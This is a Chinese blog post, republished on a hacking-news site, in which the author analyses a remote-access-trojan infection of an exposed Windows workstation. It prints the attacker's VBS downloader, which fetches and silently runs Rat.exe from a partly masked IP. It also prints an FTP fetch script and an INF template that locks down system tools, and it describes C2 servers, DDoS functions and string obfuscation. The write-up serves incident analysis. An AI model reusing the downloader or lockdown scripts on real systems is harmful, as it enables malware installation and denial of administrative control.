记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

一只肉鸡的自我修养

2015-04-29 00:20

怎么说呢?这件事说起来有点丢脸。总之就是在某个工作站上搭建了一些东西,为了方便访问就让工程师放开了部分端口的防火墙限制。谁知网管挺豪放的,一下子彻底把防火墙关掉了,还是公网可以访问。第二天发现远程桌面登不上去,工程师到机房检查发现桌面打不开,还多出了一个名为 wholove 的账户,创建时间正好在关掉防火墙之后几个小时,觉得不对劲,赶紧拉我去机房看看。

打开一看果然是被人安装了远控,直接多了一账户出来,注册表管理、CMD 乃至 explorer 都提示权限被拒绝,真是够狠的。赶紧把网线拔了分析。这位仁兄其实暗地里抓鸡闷声发大财可能还不会被发现,可是把系统能用的组件全给禁用了这也太报复社会了。话说这台机器上还是装了某杀软的,就不点名了。

这台机器上没开 Web 服务,印象中似乎装了 SQLServer,我之前疏忽没有检查有没有空密码问题,心想会不会就是从 xp_cmdshell 进来的。在资源管理器打不开的情况下,任务管理器居然还能用,就是创建不了进程,勾选使用管理员权限也不行,一律提示禁止访问。先凑合着用打开文件的对话框充当 explorer,初步看了一下系统盘,在 C 盘根目录直接见到一堆肉眼可见的脚本和可执行文件,甚至有一个就叫 bootRat.exe……system32 下面就更多了。赶紧把找得到的文件先复制出来研究。由于没办法执行程序,一个 ARK 工具都用不上。

干脆重启开老毛桃把那个诡异的 wholove 账号强制改了密码,登进去一看还是没有桌面。运行程序的时候依旧提示文件没有权限打开,不过右键可执行文件选择 runas 的时候却可以执行了——很显然这个木马篡改了 exefile 的文件关联。不过这台机器之前是装有某杀毒和卫士的,他是怎么做到改注册表的?

由于我也不确认还有哪里的设置被修改,机器也急着用,就进老毛桃里把修改时间可疑的文件全部提取出来。可以看到有许多文件特征是重复的。

➜  sample  for name in `ls|grep \.exe`
md5 "$name"
MD5 (123.exe) = 039388340ffe8f9164497108edc3ec40
MD5 (360sd_x64_std_5.0.0.5023B[1].exe) = a2989a8307d1e47b282e38678266873b
MD5 (Rat.exe) = e21cc04684e0c8311d351910416b8f80
MD5 (boot123.exe) = 039388340ffe8f9164497108edc3ec40
MD5 (bootRat.exe) = c46b78cf6171e7c0a91aca29ab50e20e
MD5 (bootkongxin.exe) = 292ced4a510bd305eb0551cb9de4d282
MD5 (bootquwu.exe) = 5e31f7737d53cce37ea1dd76466181e4
MD5 (hex123.exe) = d41d8cd98f00b204e9800998ecf8427e
MD5 (hexDhlServer.exe) = c702912a5a448e232ab01efa6b83b31a
MD5 (hexRat.exe) = da4326d86fcd3153b494670f5497e39a
MD5 (hexcn.exe) = d41d8cd98f00b204e9800998ecf8427e
MD5 (hexkongxin.exe) = db88c6e8f34d8b3c2cc9167fbf3d21c5
MD5 (hexnoob.exe) = d41d8cd98f00b204e9800998ecf8427e
MD5 (hexserver.exe) = d41d8cd98f00b204e9800998ecf8427e
MD5 (oncn.exe) = 2033a6d7d02690c31fa53d8717fc7ffb
MD5 (poqexec.log) = 369d876b0728ccb483151edc90cda507
MD5 (setquwu.exe) = 9b0b83b58d4501a08c156fdaf82d8f15
MD5 (stkongxin.exe) = 292ced4a510bd305eb0551cb9de4d282
MD5 (stquwu.exe) = 5e31f7737d53cce37ea1dd76466181e4
MD5 (svchost.exe) = 22b7bcf2fbcc1b6d4423c0f4dd74a15c
MD5 (svchost.exe.bak) = c640c68843cffa5cc5af5f109a821d02
MD5 (svchost.exe.txt) = 7f0b7aff4b6ff4b34c70c7d3849afc8c
MD5 (terms.exe) = 292ced4a510bd305eb0551cb9de4d282
MD5 (wshom.exe) = 5e31f7737d53cce37ea1dd76466181e4
MD5 (xp123.exe) = 5f1b1e6245c0032f08c8b7b31157132b
MD5 (xpDhlServer.exe) = b74135e9f4ee6d5759cc4438cf48de64
MD5 (xpRat.exe) = c0a5efda09d465349608168580c7ce10
MD5 (xpkongxin.exe) = 601c1dd8d048dd0f25e68d39075e51a3
MD5 (xpnoob.exe) = c1f20251b72653446f6aa433edf76844
MD5 (xpquwu.exe) = 7eb95773cae7e57d9f5dbe6b44a585e6
MD5 (xpserver.exe) = f87b0c72e70d7d1f706acfed3fa40f4c
MD5 (zynoob.exe) = 84fa6a96627b8532d5082f241a5b59d1
MD5 (zyquwu.exe) = 9a9c1de9e385df91de01a46a1f14b131

这么多文件一个个全部分析也不太现实。主要是这台机器是放在比较敏感的网络环境,得立即确认一下这个木马有没有局域网传播的功能,至少查出是怎么进来的。

在C盘根目录就有相当显眼的异常文件。能追查到最早的应该是这个 vbs 下载者:


Set psp = CreateObject("Msxml2.XMLHTTP")
set ws=WScript.CreateObject("WScript.Shell")
psp.Open "GET","http://118.244.*.*:9090/Rat.exe",0
psp.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(psp.responseBody)
aGet.SaveToFile "c:\Rat.exe",2
wscript.sleep 8000
ws.Run "c:\Rat.exe",0

SYSTEM32 下还有许多文件,名字里就有“rat”字样,真是……

粗看了一下三个没加壳的样本,剩下还有几个可执行文件一看就不是善茬,苦于没能耐脱壳就放一边不管了。这三个样本大小和内容都不同,一个纯 C 语言实现,另外两个是 MFC 的,还带隐藏的 CDialog……在这三个文件都有很明显的共同点,就是用完全一致的手法对一部分字符串做了混淆。一种是倒转字符串,使用的是时候调用 strrev 还原(下图 .text: 00404049):

a-party-crasher

在 .text:0040407B 处出现了另一种混淆的方式,可能利用了某种宏,将原字符串拆分成单独的字节,逐个使用偏移量赋值,避免出现完整的字符串。也许是出于节省代码长度考虑,其中四个字符放在 al – dl 寄存器中,剩下的使用立即数。这样反编译器将会识别出一大片“支离破碎”的局部变量,也算是花代码(@某花)了?

这是其中的 bootRat.exe,也就是纯 C 语言实现的那位,看样子是一个 ddos 僵尸。程序运行之后创建互斥体 118.244.. (远控客户端 IP)以防止重复执行,之后尝试连接 118.244..:2021 上,如果连接失败还有一个备用的 nb.**xiaozi.com:713 主控服务器,发送上线消息和系统基本信息,接着进入消息循环等待控制指令。控制指令里有发起多线程 DNSFlood CC 攻击、下载者、调用 iexplorer 网页弹窗等功能。

 

可是……这个木马好像没有自启动的功能……

123.exe,有一些有意思的功能,如上传用户保存的 VPN:

upload-user-vpn

正是由于本程序修改了 exefile 的 shell/open 项,加上程序不知是被杀毒软件识别还是其他原因被拒绝访问,直接导致系统内所有的程序都无法使用了。

disallow-3389

这个木马还关闭了远程桌面,要不然我们还傻乎乎的不知道工作站被搞了。

最后一个 MFC 应用也是木马,C&C 服务器在 xiaowei.f****.org:2014,有静态编译的 Zlib 库,还有标题为 Mp3InfoXP 的用户界面。主程序自带程序更新、网页弹窗、远程关机等功能,除此之外还会在系统目录下释放 DllFile、DllScreen、DllShell 等多个动态链接库。时间所限就不一个个解包分析了。

经过 C 盘下的一些痕迹推断,这次入侵似乎是使用一款名为“大灰狼1433 V3”的自动化抓鸡工具扫到的。

除了一开始使用的 vbs 下载者,抓鸡方还添加了大量的批处理和脚本,一时间看不完。但是下面的内容是不是有点太丧心病狂了……

[Version]
signature="$CHICAgo$"
[File Security]
1="c:\windows\system32\cmd.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"
1="c:\windows\system32\command.com", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"
1="c:\windows\system32\net.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"
1="c:\windows\system32\net1.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"
1="c:\windows\system32\ftp.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"
1="c:\windows\system32\cacls.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"
1="c:\windows\system32\icacls.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"

一下子禁掉这么多文件的访问权限……

open 116.255.*.*
123
123
get quwu.exe setquwu.exe
bye

这是样本里大量的 FTP 指令文件的其中一个,它们指向地址和账户密码居然都是完全不同的。隐约看到背后一张巨大的网络。

从 gouri.bat 和 sb.bat 等文件名和内容来看,入侵者在自动化抓鸡没有成功的情况下挽起袖子上来手动种马,情绪还有一点激动。毕竟开端口这事是我们脑残在先,机器被搞瘫误了事也只好自认倒霉,默默去重装系统了事。

仅出于好奇的出发点做了一点皮毛的研究,这博客服务器不耐操,还请手握众 DDOS 客户端的大哥们高抬贵手。以上。

知识来源: chichou.0ginr.com/blog/1143/a-party-crasher

阅读:121044 | 评论:0 | 标签:Windows 安全

想收藏或者和大家分享这篇好文章→复制链接地址

“一只肉鸡的自我修养”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云